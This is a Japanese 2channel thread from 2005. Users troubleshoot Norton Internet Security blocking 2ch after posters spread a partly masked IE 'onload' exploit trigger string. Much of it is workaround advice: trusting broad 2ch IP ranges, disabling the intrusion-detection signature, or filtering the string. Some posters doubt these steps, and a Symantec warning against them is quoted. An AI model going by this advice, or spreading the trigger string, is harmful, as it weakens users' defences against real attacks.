ノートン誤作動対策本部
レス数が950を超えています。1000を超えると書き込みができなくなります。
詳細: 侵入を検出して遮断しました。 news19.2ch.net(206.223.151.67) とのすべての通信は 30 分間にわたって遮断されます。
アドレスをクリックすると攻撃者を追跡できます
この攻撃について詳しくは シマンテック・セキュリティ・レスポンス 1. [侵入検知]をダブルクリック
2. [AutoBlock]をクリック
3. 〔除外〕をクリック
4.右にある除外したコンピュータの[追加]をクリック
5. [範囲を使う]をチェック
5. 開始アドレスに「206.223.147.0」を入力、終了アドレスに「206.226.154.255」してOKをクリック
>>1
乙
まあここに書いても
ここも反応して見れなかったからあんまり意味ないかもね >>3
[AutoBlock] じゃなくて信頼ゾーンにおかなきゃだめぽ
>>4
それ言うとスレに貼るバカが増える >>4
<body onload=w****w()>
らしい。一応伏せておく >>7
いや具体的に聞きたかったんじゃないのよ
なんか貼られてるから反応してんのね?
鯖側のせいでないことだけ確認したかったのです。
でないと怖くて信頼ゾーンなんか設定できない。 ERROR:referer情報が変です。(ref1)
書き込もうとすると↑が表示されて書き込めないのはなぜ?
回避方法きぼん。 2chサーバの全IP
206.223.147.0-206.226.154.255
ってこれでいいの? 1. [ファイアウォール]をダブルクリック
2. [ネットワーク]をクリック
3. [信頼]をクリック
4. [追加]をクリック
5. [範囲を使う]をチェック
6. 開始アドレスに「206.223.147.0」を入力、終了アドレスに「206.223.154.255」してOKをクリック × 206.223.147.0-206.226.154.255
○ 206.223.147.0-206.223.154.255 VIPみれねええええええぇぇぇぇぇぇぇぇぇwwwwwwwwww >>1
「アドレスをクリックすると攻撃者に反撃できます」
とかそういう機能作ってくれないかなあ、ノートン先生 13やってもギコナビ使えるようになりません。
ノートン無効にしないとつかえるようにないません >>14
これやったけど、運用情報だけはNISきらないとみれない つまりノートンは使うなという警告ですか。そうですか・・・ 脆弱性うんぬんはおいといてさ
実際に悪さをするスクリプトな訳でもないただの文字列に
「誤反応」してるだけでしょ?
だったら、loveletterウイルスのソースと同じじゃん。
結論:脳豚氏ね 598 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2005/11/27(日) 18:15:04
とりあえず、侵入阻止→拡張→HTTP MSIE javaScript OnLoad Rte CodeExecの
チェックを外すと出なくなるけど、
阻止してもらいたいときに切ってしまっているのはマズい気ガス
948 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2005/11/28(月) 18:18:55
>>898
2005なら >>598
2004だと、侵入阻止→設定→詳細→HTTP MSIE javaScript OnLoad Rte CodeExec
を除外 世界中のフォーラム、ブログに例のキーワード貼りまくれば
シマンテックに苦情がいくと聞いたんですが本当ですか? 問題を起こしてるのはNISだけなんです
NAVまで悪く言わないでくださいw バスターも4月に前科あるからな。
アップデートするとCPU使用率が100%になるっつーウィルスばら撒いたし。
もう何を信じりゃ良いのか >>37
あんときゃノートン先生でよかったとつくづく思ったもんだ
('A`)ホントにどうしよ。 まールーターはさんでるし、設定緩めてもいいかー・・・
なんだか負けた気分orz >>37
俺にとってはかえってうれしかったぞ。
1ヶ月サポ期間延長したし、 ノートンの進入検知を殺すと見れた。
>>40みたいに、ルーターを信じてみます。。。。 一応信頼に範囲入れるという形で復帰。
つうかMSが修正しない限りだめってことか。 ラブレターのコードと同じだからMSか脳豚どちらかが対応しないと無理だろ。 @Jane系の専用ブラウザ使ってる場合
JaneフォルダにReplaceStr.txtというテキストファイルを作り
onload=[Tab]onload=
みたいに置き換えればOK(↑の”[Tab]”はタブ入力)
Tabキーを押すのを忘れて[Tab]onloadとそのまま書いてはダメ
これってガセなの? ラブレターはなんで修正されないん?2ちゃん以外でも影響あるんじゃね? >>52とか
おまえらAutoBlockの遮断解除やった? >>13のやっただけなんだけど、(なおった)
そのままでいいのかなぁ? auto protect offにしとくとか、そーゆー問題じゃねーの?
普通にみれるけど。
後で何かあったらヤだな。
>>56
2005なら進入検知って項目あると思うけど MSがIE脆弱性の対策を実行後
NISの侵入検知の設定から
HTTP MSIE JavaScript OnLoad Rte CodeExec
を除外すれば問題は解決するのでは?
>>59
> MSがIE脆弱性の対策を実行後
最短でも半月は放置だね でもWEBデザイナーにとってIEは切っても切れない関係にある >>63
2chが攻撃してこないだろうと思うならそれでおk これどうすればいいんだ ある板だけ見れぬ ノートン切れば見れるけど・・・ 今自分が書き込んでるスレを読めないような奴は
対処して他のスレを読めるようになっても無駄だと思わないか? 2ちゃんねるというのは広いからね。。。色んな意味で すまんマルチになってしまうがこっちにレスするべきだったか
http://game10.2ch.net/test/read.cgi/handygame/1133147093/
このスレが開けなくなったんだが
ここの
370 :枯れた名無しの水平思考:2005/11/28(月) 14:15:46 ID:F9m8RPjZ0
????
こいつのメール欄
これ何?これのせい?
>>71
侵入検地→AutoBlock→現在AutoBlockで遮断してあるコンピュータ
の欄に2chのアドレスがあれば解除。30分で自動でなくなるけど。 おう・・・>>72と>>13のコンボでいけたよ あるがとう>>72 スマン早とちりした
398と500だな
2回も>>8これ貼ってやがる
で、侵入検地→AutoBlock→除外→削除して
ノートン解除してスレ読み込んで該当レスを透明あぼ〜んで解決できました 1. [ファイアウォール]をダブルクリック
2. [ネットワーク]をクリック
3. [信頼]をクリック
4. [追加]をクリック
5. [範囲を使う]をチェック
6. 開始アドレスに「206.223.147.0」を入力、終了アドレスに「206.223.154.255」してOKをクリック
たまにこういうのがあるけど、こういうことやって何が楽しんだろうといつも思う。 めんどくさいならやらんでもいい
2chをやめるのも選択肢の一つだし ああ、言葉足らずでゴメンナサイ
上のは解決法で下の言葉は誤作動させる文字列についてのコメント。
てか、上の貼り付けた意味ないしスマンカッタorz >>75のやり方で解決したけどシマンテックがいずれ対応してくれんのかな かくしんはん【確信犯】
道徳的・宗教的・政治的な信念に基づき、自らの行為を正しいと信じてなされる犯罪。
思想犯・政治犯・国事犯など。
三省堂提供「大辞林 第二版」より ノートンはアンチウイルスだけでいいじゃん。
ノートン インターネットセキュリティなんて不要。
ノートンはウイルスが専門。
インターネットとか専門外。
アンチウイルスがよくできてるからって、何でもかんでもノートンに頼ろうとするのがおかしい。
ネットセキュリティはそれ専用のもっとイイの使えばいいじゃん。
おれノートンシステムワークだけどなんの問題もないよ。 , '´  ̄ ̄ ` 、
i r-ー-┬-‐、i
| |,,_ _,{|
N| "゚'` {"゚`lリ や ら な い か
ト.i ,__''_ !
/i/ l\ ー .イ|、
,.、-  ̄/ | l  ̄ / | |` ┬-、
/ ヽ. / ト-` 、ノ- | l l ヽ.
/ ∨ l |! | `> | i
/ |`二^> l. | | <__,| |
_| |.|-< \ i / ,イ____!/ \
.| {.| ` - 、 ,.---ァ^! | | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄l
__{ ___|└―ー/  ̄´ |ヽ |___ノ____________|
}/ -= ヽ__ - 'ヽ -‐ ,r'゙ l |
__f゙// ̄ ̄ _ -' |_____ ,. -  ̄ \____|
| | -  ̄ / | _ | ̄ ̄ ̄ ̄ / \  ̄|
___`\ __ / _l - ̄ l___ / , / ヽi___.|
 ̄ ̄ ̄ | _ 二 =〒  ̄ } ̄ / l | ! ̄ ̄|
_______l -ヾ ̄ l/ l| |___| 先生の過保護は信頼面もカバーした上ならいいんだが
現状のFWに関する被害とか調べるとやっぱ誤作動としか呼べんもんなのなかね
アドバンテージが万が一多少あっても、弊害によるリスク大きすぎ
情報集めるのに2chみれないのは痛い >>13
を設定したら使えるようになったんだけど
これって要するに
にちゃんの鯖からアタックきてもヌルーするぜ!って設定と考えてok? すいません、それでその2ちゃんの鯖からのアタックっていうのは
ありえることなんですか? >>13 を設定した後見るには見れたけどアンカーがずれまくってる
これはどういうことでしょう… >>93
全て自己責任でどうぞ
そういう場所なんで ノートンのオートプロテクトを無効にしてると、反応しないの? とりあえず
ノートンインターネットセキュリティーをアンインストールして
ノートンアンチウイルスは残して
ZoneAlarmとかゆうのでもインストールしとけばいいのかな? そこまでしなくてもいいんだけどね
これを機にNISと縁を切りたいならアンインストールしたらいい >>103
つい最近NIS2003を在庫処分900円で手に入れたばっかなんだが
こんなことになるとは思わなかった >>107
ニ|ニ , -─- 、 \
o‐、 / ヽ ) 2chのIP除外して
‐ヽ‐ l ..... .... ! ( 攻撃されたらどうしようって?
(こ rj. ,ィぇ rぇ、 lォ }
l − `l / ー ヽ l′ ノ/⌒て_
| ー __,人. {ゝニ.フ } /ヽ_ `ー
/7.| r/ j_\、_ィ/ノ 8 o sヽ \ー'⌒ヽ-
7 ト_/ j O⊂¬‐ 、d 9 l ノ だったら2chから
ヽxyトミ}| l{三 ノ \<>| ( 引退すれば万事解決だぜ!
ス且ー'| |ー 'ヽ  ̄) )
ブロードバンドルーターがあれば、ファイアーウォールの設定など
少々甘くしても大丈夫なんじゃないかって気はするが。 ルータの設定をちゃんとやれば、という前提でならね。
そして今回問題になってるタイプの脆弱性はルータでは防げない。 >>111
いや、IEの脆弱性のほうじゃなくて、今回の誤動作対策に
2chの鯖を許可リストに入れた場合の攻撃うんぬんのほう。 ノートン作動したら、この板見れなくなったよ
ここに対策スレ立てても意味無いから! >112
ああ。そんなもん心配するのはネタかと思ってた。
>114
どこに立てても同じ。 >>116
意味無いし、忘れた頃に原因究明したくても、あぼーんされてたら気がつかない 抜本的な解決策は>>13+>>72でいいのでしょうか? 応急なんですね。シマンテックは対応してくれるのかなぁ…。 ノートン2003の場合は、こっちも必要では?
質問・雑談スレ208@運用情報板
http://qb5.2ch.net/test/read.cgi/operate/1132976990/250
250 動け動けウゴウゴ2ちゃんねる sage 2005/11/28(月) 16:02:49 ID:sD89a3L50
でも今になって出てくるんだからセキュリティホールって言うものは恐ろしい
>>235のを適用する方法を書きます。
ノートン2003の場合
1. [侵入検知]をダブルクリック
2. [IPアドレス]をクリック
3. 右にある除外したコンピュータの[追加]をクリック
4. [範囲を使う]をチェック
5. アドレスに「206.223.147.0-206.226.154.255」を入力してOK とりあえず、オミトロンのフィルタ。
即席だし、ノートン入れて無いから使えるか分からんけど。
[Patterns]
Name = "Kill NortonTrap2"
Active = TRUE
URL = "[^/]++.2ch.net/"
Limit = 256
Match = "onload="
Replace = "notload" 使ってないから知らないんだけど、PFWだけアンインストール出来ないのかい?
出来るなら、アンインストールして、フリーの適当なやつを使うのが一番じゃないかと思う。 >>124
NAVとPFWを別に導入してるならともかく、NISではPFWだけアンインスコはたぶん無理だったかと。
もちろん、PFWをオフにして、別のFWを使う手はアリだけど。
>>122
ノートン2003の場合は[ファイアウォール]と[侵入検知]両方の設定が必要なの? 終了アドレスが
>>122だと 206.226.154.255
^^^^
>>13だと 206.223.154.255
^^^^
だけど、どっちが正しいんだろう。開始アドレスはどっちも同じだけど。
>>126
コピペしただけなので分かりません、すみません。 >>125
そうか。この件であたふたするのはPC初心者だろうから、あれこれ入れろと言うのもなあ。
困ったもんだねえ。 >>13 今やったけどほんとにこれを信用していいのか?
運営側の公式な対策の発表を求めます。 >>3やったら見れる様になったけど、これって何かまずいの? >>131
そのアドレス範囲にあるコンピュータから攻撃を受けてもノートンが反応しない >>127
>>3と>>122の226はコピペミスだと思う。>>13,14がたぶん正解。
下の鯖監視係で確認できる。あとイレギュラーなのはbeとsports2
be.2ch.net (202.222.31.214)
sports2.2ch.net (210.224.161.33)
使う鯖のIPアドレスを個別に指定したほうが安全だと思うし、
個人的にも安心する。
2ch 鯖監視係。
http://sv2ch.baila6.jp/sv2ch01.html ルーター入れてる人は>>13やっても問題ないんじゃないの? 壷うぜえええええええええええええええええええええええええええええええええええええええええ 少なくとも今回の壷は役に立っていると思う。
まだ知らない人もいるかもしれないしね。 >>129
http://qb5.2ch.net/test/read.cgi/operate/1132976990/
442 名前:動け動けウゴウゴ2ちゃんねる 投稿日:2005/11/29(火) 15:01:54 ID:eTCs9aYs0
>運営の人
ノートン誤作動の件なんだけど明らかに狙って書き込みしてるんだから
特定文字列を書き込みしようとした人を強制バーボンとかしてもいいんじゃないの?
448 名前: ◆SSu.zv/rvs 投稿日:2005/11/29(火) 15:14:32 ID:zBqE3jpw0
淘汰されなきゃね、
生き残りを手伝う気はさらさらないっす
449 名前: ◆MUMUMUhnYI 投稿日:2005/11/29(火) 15:18:01 ID:VEIDKG1+0
そんな迷惑なソフトなんて、自然にまかせてなくなるべきだって、
おじさんはゆうだろうな。
私も、そう思っていたり。
◆SSu.zv/rvs=FOX ★ ◆MUMUMUhnYI =root ★
色々調べたら俺の使ってるjaneDoeViewでリプレイス出来るみたいだな
これでいいや 壷c⌒っ*゚д゚)っφ 記念カキコ
しかしノートン先生は2ちゃんねるに厳しいでつね('A`) AutoBlockも解除したんだけど
なぜかノートントラップが直らんorz で、結局どうなったんだ?
誤動作して終わりなのか? |,゚д゚)・・・・・ ツボ。それ以前に
僕のノートン先生はぶっ壊れてるからある意味無意味。
現在の情報が更新中から更新されないし。。。
項目クリックするとページが表示出来ませんって言われるし。。。 攻撃を遮断しましたって出るけど
ふつうに2ch見れますよ。 13と14でいいんだな
これって見れないときにいちいちやんなきゃいけないの?
それとも一度やっとけばいいの? 壺UEEEEEEEEEEEEeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee つぼってなんなの?
2chのトップページのやつでしょ? 壺から来ました!!!
Monazilla/1.00 Live2ch/1.12 壷から攻撃を受けました
アドレスをクリックして攻撃者を追跡してここにたどり着きますた >>13を実行すると2ちゃんに対して限りなく無防備になる・・!
これはひろゆきの陰謀・・2ちゃんIP除外さsghbfxg@ふじお」 それでも壷
何かと引っかかってくるノートンなんぞ使うなYO! ノートン2003版はどうしたらいい?
>>122してもダウソ板は見れない WIN95時代にノートン製品使って痛い目見てから俺はここのソフトは使ってない。 >>206
たぶん遮断されたままになってる
侵入検知の設定で消せ
VIP臭いとかいわれて●ログインなしで書き込めない・・・ ノートン使ってるのに2ch見れるんだけどどういうこと? >>13の設定でいいのかそれとも>>133のように個別に設定した方がいいのかどっちがいいの? >211
そりゃ個別に設定した方がbetterじゃろ。
>207
DOSのころからろくでもなかった。 壺から呼ばれました。
2006使っているけど、特に問題ないよ。 >>208
いや、ちゃんと遮断は削除してるんです。
個別にIP指定しても、すでに含まれてますってなるし。 もういや 壷
亀だけど礼を言いたいのは>>96に対してですた >>213
検知とファイアーウォール両方いじったら直ったよ 俺の場合(2005)はFWだけ弄れば見たい板は問題なく見れるようになった。
範囲でFW通すのは何やら精神的に気持悪いから、個別で指定してる。まぁそれでもいい気はしないがね・・。 心配なら取得する時のみ無効にすればいい。侵入検知を切るだけでおk 侵入検知はオートプロテクトを切ると切れるんですか? 壷さんからお呼びがかかりました。
ウイルス警備隊ユーザーには関係ないぽね 昨日何とも無かったのに今日になったら誤作動したよ
めんどくせえなぁ ノートン先生もぼけ来てるんじゃね。
家のバスター君は元気だけど。 3月に期限切れる
何に乗り換えようかな
バスターがいいのか? >>237
NOD32+zonealarm or outpost 俺は今後
Norton AntiVirus + zonealarm
考えてみりゃ最初からこうすりゃ良かった キングソフトのインターネットセキュリティーが今なら無料だから入れてみようかなぁ?
中国製だけどソースネクストのよりは良い? >>238>>239
おれもどっちかにしようと思ってんだけど
どっちがいいかなあ
どっちか勝った方にするから悪いけど戦ってくんない? >>239
来月切れるからその組み合わせ使わせてもらうわ ttp://upload.fam.cx/cgi-bin/img-box/6oj51129212301.jpg
ダウソ板見れるようにしてくれよ JaneDoe View α + Privoxy + Tor ウイルスバスター使いなよ
軽いし自動で何でもやってくれるし あー。コレか原因は。
LiveUpdateで勝手に入ったから突然変になった様に感じた訳か。
このまま何の対策も無かったら次の期限でオサラバするか。
とりあえず今の所は進入検知切ってログ取得。
IPを除外リストに入れても、例の文字列書いてあるスレの
ログ取得するとログがメチャメチャだし。 MSのアップパッチを最近入れてなかった俺は勝ち組。ノートン通常どおりに働いていて問題なし。 市販ソフトの誤動作に2ちゃんが尻拭いする必要はないと思うが >>258
悪いのはこんな糞な仕様なソフト作ってるシマンティックだし
>>167
の通り、2ch側で対応するべき問題じゃない。
この問題を対応するのはシマンテック側だろ。
ま、シマンテックは今までに報告されてる誤作動も修正したことないし今回もスルーだろう
自分で>>13とかの応急処置をするしか方法はないかと
今回ので俺はノートンからさよならした ギコナビみれるようになったけど、行間ができてるみたいなんだけど
これって直らないの?
AAとかがみにくい・・・ 役に立つかどうかは分かりませんが、誤反応しないようにdatを
書き換えるプログラムを更新してみました。
http://www.geocities.jp/cen_hp/program3.html ノートン2003だけど、どうしても、ダウソ板だけ見れないよー
ノートンの侵入検知切ったら見れるようになったけど
この侵入検知って切ると何がヤバイの?
何が侵入してくる? IE使っていない人は
拡張でHTTP MSIE〜のチェックを外す方が安全じゃないか? >>270
私の名は喪黒福造
人呼んで笑うセールスマン
セールスマンと言っても、ただのセールスマンでは御座いません。
私の取り扱う品物は「心」人間の心で御座います。
この世は老いも若きも男も女も、心の寂しい人ばかり。
そんな皆様の心の隙間を、お埋め致します。いいえ、お代は一銭もいただきません。
お客様が満足していただけたら、それが何よりの報酬でございます。
さて、今日のお客様は……
ほぉ〜ほっほっほっ NISの侵入検知から拡張の中のHTTP MSIE JavaScript OnLoad Rte CodeExecを除外
これと、>>13とはどっちが安全なの? >>259
NIS2005Onlineです。NISのアップはバッチリやったよ。 >>269が良い事言った。無条件で侵入ルート空けとくよりMSIE〜のチェック外す方が全然安全だわ。 別にノートン使ってる人の自己責任じゃないの?
2chで対策するようなことじゃないよ。 なんか例の対策は自己責任とか出るしとってもやりにきんだけど
なんか対策してないのにこのスレ読み込めるようになったのは
2ch様が対策してくれたのですか?bodyなんちゃらをNGワードにしても
意味ないらしいし…なんでこのスレみれるようになったんでしょうか 296 名前:動け動けウゴウゴ2ちゃんねる 投稿日:2005/11/28(月) 17:58:55 ID:Ejg9D+rr0
何も対策してないのに、少し前から急に見られるようになった。
297 名前:動け動けウゴウゴ2ちゃんねる 投稿日:2005/11/28(月) 18:00:38 ID:7P7mflxJ0
30分経過しただけじゃね?
299 名前:動け動けウゴウゴ2ちゃんねる 投稿日:2005/11/28(月) 18:05:08 ID:M2vw8U+r0
>>296
自分も。
なぜだろう。
303 名前:動け動けウゴウゴ2ちゃんねる 投稿日:2005/11/28(月) 18:18:00 ID:WmGEF4hJP
>>299
詳細: 侵入を検出して遮断しました。
news19.2ch.net(206.223.151.67)
とのすべての通信は 30 分間にわたって遮断されます。
アドレスをクリックすると攻撃者を追跡できます
この攻撃について詳しくは シマンテック・セキュリティ・レスポンス
30分我慢すればいいのか。
こういう悪いことは一体誰がどういう経緯で気づくんだろうか。
ウィルスコードで誤反応とか解決できたと思ったら、すぐまた新しい手段でくるし
大宮寺 あゆ親衛隊みたいのがまた真似して貼りまくるんじゃないのか・・・
今度はその鯖自体読み込めなくなるのって凶悪すぎるよ・・・。
こんなの実況中に貼りまくられたら、「スレが見えなくなったんだけど?」みたいな
そういうレスばっかになって台無しだよ。専ブラのNG指定でも効果ないなんて
安心していいんですか?
対策施して、これ考えた人がそれすらも予想していて
対策した人になんか攻撃してくる方法編み出してたらどうすればいいの?
206.223.147.0-206.223.154.255、
除外しない方がいいんですか?全ては自己責任とか書いてるし
なんか不安材料ありますみたいな書き方だし。キンタマウィルス流し込まれたり
山田ウィルス流し込まれたりされませんか?
ウィルスコードの文字列とかは、ログ除外しても「文字コードだけでどうやって感染するんだw」
みたいな説得力あるお言葉があったからいいけど・・・。今度のは・・・? 山田もキンタマも>>283がすでにそれらに感染してないと
どうもならないよ ながしこんで自動感染させる事が出来たら
P2Pとかつないだ瞬間感染しちゃう 山田とかキンタマは○○.exeって感じの実行形式ファイルだから
これらをどっかから手に入れて、実行して感染して、さらに
>>283がファイアーウォールの206.223.147.0-206.223.154.255を除外したら、
ひろゆきに、ごにょごにょされる可能性があるっちゃある 大空寺あゆってHELVAだっけ?アイツ悪で有名なのか? 反抗予告とかめちゃやばい書き込みとかはすぐ反応して消すのに・・・
>>288見たいなのは放置なんだね運営のひと >>13は実行したけどWin板が読めないです... (ノД`) すんませんでした Janeのスレ再読み込みで原因判明です
自分が見ようとしてたスレの最終レスに>>4が書き込まれてた (`・ω・´) >>291
一時、先生の進入検知をオフにして
その板なりスレなりを読み込んでログを取得する。
そのあと侵入検知をオンに戻せばいい。
アンカー狂ってる人もこれやってログを再取得すれば直るよ。
難点はちょっとだけマンドクセ(´・∀・`) >>294
はい、そんなふうにやってみますね
アドバイスどうもありがとう (*´д`*) 単なる文字列まで潔癖に反応しちゃうんだよな
確かに強力ではあるけどさ >>291
Win板はちゃんと>>13の範囲内にあるから読めないのはおかしいな
多分侵入検知で30分読めない状態になってるとかそんなのだから
侵入検知設定で解除すれば? このスレ、どれが反応しているの?読み込んでも残らない。 夕べノートンからバスターに乗り換えたけど、
ノートンの潔癖なところが恋しくなってきた。 >>303
NIS2003が思いっきり間違ってますよ。 >>303
最初の文字デカッ!老眼かよw
それなのに赤の自己責任がいやに小さいじゃないか
何にしても乙 >304
なおしたー(^_^;)
>306
ちょっとだけ(^_^;)>老眼
やや小さめにしてみた。 JaneDoe Viewだけど あぼーんに>>26と>>267のコードを登録すると今のところ問題ないみたい >>308これでおけ
NIS2003
Norton Internet Securityを開く
[ファイアーオール]をクリック
[設定]をクリック
[ホームネットワーク]タブをクリック
[信頼]→[追加]とクリック
[範囲指定を使う]にチェック
[インターネットの開始アドレス]に 206.223.147.0
[インターネットの終了アドレス]に 206.226.154.255
[OK]をクリック ×ファイアーオール
○ファイアウォール
すまんかった
NIS2003
Norton Internet Securityを開く
[ファイアウォール]をクリック
[設定]をクリック
[ホームネットワーク]タブをクリック
[信頼]→[追加]とクリック
[範囲指定を使う]にチェック
[インターネットの開始アドレス]に 206.223.147.0
[インターネットの終了アドレス]に 206.226.154.255
[OK]をクリック >>303
対処方法にNIS2006の場合が無いのはどうして? >319
あ、現行商品って2006なの?(^_^;)
つか、誰か2004の対処方法教えて・・・・ >>320
マァヴ氏のセキュリティ感覚に疑念を抱く漏れであった…(´-ω-`) Down板でNIS2006のクラック方が書き込まれた後に、この騒動が起こった。
シマンテックの仕業と思うのは自分だけだろうか。 >>320
この文追加すると親切かも。
206.223.147.0-206.226.154.255 の範囲に入らない板も存在するので
必要に応じて下記URLを参照し個別に設定して下さい。
http://sv2ch.baila6.jp/sv2ch01.html なんでこういう事するやつって永久アク禁にならんの?
何も悪くないオレ様が2chにアクセスするために
なんで脳豚の設定弄らなきゃならんの?
ばかじゃね。
>324
加えたー(^_^;)
>326
みてみるー(^_^;) もう面倒だから一旦NIS切ってログ取得してからONにしてる
これで問題なす >>318>>324
終了アドレス
×206.226.154.255
○206.223.154.255
2004は2005と同じと判明(^_^;)追加ー
2006はよーわからん 202.222.31.214 be.2ch.net
206.223.147.35 headline.2ch.net stats.2ch.net
206.223.147.55 2chplus.2ch.net music4.2ch.net
206.223.147.60 pc7.2ch.net
206.223.147.220 aa5.2ch.net off3.2ch.net
206.223.147.230 qb5.2ch.net qb6.2ch.net
206.223.147.235 that4.2ch.net
206.223.148.120 up01.2ch.io
206.223.148.200 pc8.2ch.net
206.223.149.230 human5.2ch.net
206.223.149.235 school5.2ch.net
206.223.150.10 hobby8.2ch.net
206.223.150.15 bubble4.2ch.net
206.223.150.54 live22.2ch.net
206.223.150.100 book3.2ch.net travel2.2ch.net
206.223.150.110 live20.2ch.net
206.223.150.115 game10.2ch.net
206.223.150.120 news18.2ch.net
206.223.150.155 society3.2ch.net
206.223.150.175 etc3.2ch.net
206.223.150.180 live14.2ch.net qa.2ch.net
206.223.150.185 academy4.2ch.net science4.2ch.net
206.223.150.195 comic6.2ch.net
206.223.150.200 food6.2ch.net
206.223.150.205 tmp5.2ch.net
206.223.150.230 ex9.2ch.net
206.223.150.235 tv8.2ch.net
206.223.150.240 sports9.2ch.net
206.223.151.62 hobby7.2ch.net
206.223.151.67 news19.2ch.net
206.223.151.75 pie.bbspink.com
206.223.151.95 idol.bbspink.com
206.223.151.125 love3.2ch.net
206.223.151.130 live19.2ch.net
206.223.151.135 liveb1.2ch.net
206.223.151.140 money4.2ch.net
206.223.151.225 ex14.2ch.net
206.223.152.15 music5.2ch.net
206.223.152.30 dso.2ch.net etc4.2ch.net game9.2ch.net
206.223.152.40 sakura01.bbspink.com
206.223.152.50 live16.2ch.net
206.223.152.55 life7.2ch.net
206.223.152.60 sakura02.bbspink.com
206.223.152.145 tv7.2ch.net
206.223.152.150 live18.2ch.net
206.223.152.235 sakura03.bbspink.com
206.223.153.130 headline.bbspink.com
206.223.154.225 ex12.2ch.net
206.223.154.230 ex13.2ch.net
206.223.154.235 live21.2ch.net
206.223.154.240 anime.2ch.net
206.223.154.245 ex11.2ch.net
210.135.98.243 epg.2ch.net
210.224.161.33 sports2.2ch.net 2006
「ファイヤーウォール」
「設定」
「ホーム(アクティブ)」←ここは設定による
「ネットワーク」
「信頼ゾーン」
「範囲で選択」 2006も2005と同じ操作でいける
ただ設定ボタンは右下(これは2005でも同様だと思う) >>330
あれ、スマンです。
書き間違えた orz 五月蝿い事いって悪いけど、INS2003はダイヤログの表示無く
いきなり、404になるので混乱する人も居るかと… うあー、しんど!全部一個づつ追加した。
間違えてなければいいけど。これで安心かな!?
来年はノートンとおさらばする 範囲で選択しなくても「個別」で空白区切りで登録できるお
202.222.31.214 206.223.147.35 206.223.147.55 206.223.147.60 206.223.147.220 206.223.147.230 206.223.147.235 206.223.148.120
206.223.148.200 206.223.149.230 206.223.149.235 206.223.150.10 206.223.150.15 206.223.150.54 206.223.150.100 206.223.150.110
206.223.150.115 206.223.150.120 206.223.150.155 206.223.150.175 206.223.150.180 206.223.150.185 206.223.150.195 206.223.150.200
206.223.150.205 206.223.150.230 206.223.150.235 206.223.150.240 206.223.151.62 206.223.151.67 206.223.151.75 206.223.151.95
206.223.151.125 206.223.151.130 206.223.151.135 206.223.151.140 206.223.151.225 206.223.152.15 206.223.152.30 206.223.152.40
206.223.152.50 206.223.152.55 206.223.152.60 206.223.152.145 206.223.152.150 206.223.152.235 206.223.153.130 206.223.154.225
206.223.154.230 206.223.154.235 206.223.154.240 206.223.154.245 210.135.98.243 210.224.161.33
一行に直して登録すれ
一瞬固まるけどw >>339 ちょwwおまwwwwwwwwwww
でも登録のとこ右クリできんかったけど ノートンだけどまったく反応しない…
専ブラのフォルダだけ除外してるからかな…? アドレス指定して、専ブラのブクマしたスレは見られるようになったが、
スレ一覧の取得をすると同じ侵入検知を吐くのが謎だ…@ゾヌ1.0
HTTP MSIE〜自体の許可しかないのかなー? >>342
>>344
ノートンアンチウィルスじゃないぞ。
ノートンインターネットセキュリティの話だ。 はじめまして、こんばんわ。
僕も3日前くらいからHTTPなんちゃらエラーが出て、
2chの一部が見えたり見えなくなったりしてました。
最初は2chにアク禁されてる?とか2ch落ちてる?とか
思ったのですが、運用情報を思いついてここに来ました。
>>13が正しいってことで無問題ね。
僕も今のところ問題なし。
>>79
びびったYO
>>2chを信頼ゾーン
2chにハッキングされない?
ひろゆ○は2chねらーのパソコンやりたい放題じゃんw
>>ノートン先生の誤作動
高性能で検出率が高いから仕方ないと考えたら? 範囲じゃなく>>339をコピペしたほうがいいよ
ノートン文字列だけで反応することないだろうに
ファイアウォール部分だけのアンインストはできないから
次はアンチウイルスだけ買おうと思う >2ちゃんねるのサーバーのIPアドレスを信頼できるゾーンに設定すればブロックされなくなるが、
>シマンテックでは「本当に危険なコードが埋め込まれた場合にブロックできなくなるので、お勧めはしない」という。
http://internet.watch.impress.co.jp/cda/news/2005/11/30/10035.html >>342 >>344
MSのアップをしていないからだよ >339
まとめサイトに入れたー(^_^;)これはいいや 今、バスター御試版で読んだが、なんとも無い。ふ〜ん。 >>341 登録するIPが、すでに登録されている範囲にかぶってると「かぶってるよ」って言われるけどそれかな >>354
右クリ→貼り付けのことじゃない?
Ctrl+Vじゃなくて。
確かに、登録窓で右クリはできんよなぁ。 シマンテックでは「本当に危険なコードが埋め込まれた場合にブロックできなくなるので、お勧めはしない」という。
また、「脆弱性を突く攻撃コードを2ちゃんねるにいたずら目的でコピー&ペーストしている人がいる」とし、
安易に攻撃コードを書き込まないよう呼びかけている。
この言い方から考えると、シマンテックは対処する気ないみたいだな。
やっぱり自己責任で弄れってことか・・・ 書き込むなって言ってみんなが書き込まなくなるなら、ウィルスやスパイウェアは蔓延しないと思う・・・ 貼られてるスレがどんどん増えてるな・・・
>>356のとおりだとメーカーは対応する気無いみたいだし
穴あけることになるのも嫌だからノートン止めるかなぁ >>356の書き込みソースは、>>350のリンク先な。
漏れの妄想じゃないから、各自で熟読してくだされ。
ラブレターコードの影響期間を思い出すと、今回のこれも相当長引きそうだよな。
NISの見切り時かもなぁ。強固なのは結構だが、柔軟性に欠け過ぎて使えねぇ・・・ 今「本当に危険なコードが埋め込まれた場合」はノートン組は侵入されまくりってこと? 2ちゃんに危険なコード埋め込まれることとかあるの? 今の2chはハッカーからしたら格好のエサ場ってことか
入れ食い状態だもんな えーと、
最初ログ取得する時だけ進入検知を切って、取得し終わったらまたつける。
ちょっと面倒だけど、今の所コレだけで問題は無いけどな。
また新たに例の文字列が書かれたら、多分2行目を繰り返す事になると思うけど。 運営が、特定の文字列を書き込めないようにすれば良いだけなんだがなァ・・ 喪前が、脳豚なんてしょーもないもんを使わないようにすれば良いだけなんだがなァ・・ さっきこのスレ見てたらブラウザが開きまくって止まらなくなったんだけど
何これ?
>>367
2ちゃんだけの問題じゃなくて、他のブログ、掲示板も同じようにされたら駄目らしいし
まさに「淘汰される」べきかと スレをひらいたらカーソンシティから攻撃されたのできました >>372
一部の運営の中の人の発言から始まってるんだよ >淘汰されるべき
>>373
内容が理解できない、もしくは想像ができないなら、実行するべきではない。 >>372
NISだけでしょ叩かれてるのは
NAVは誰も叩いてないし >>384
少なくともこのスレとは関係ない
つーか、あったら怖いよw ぱく(ry
ノートン応急対策
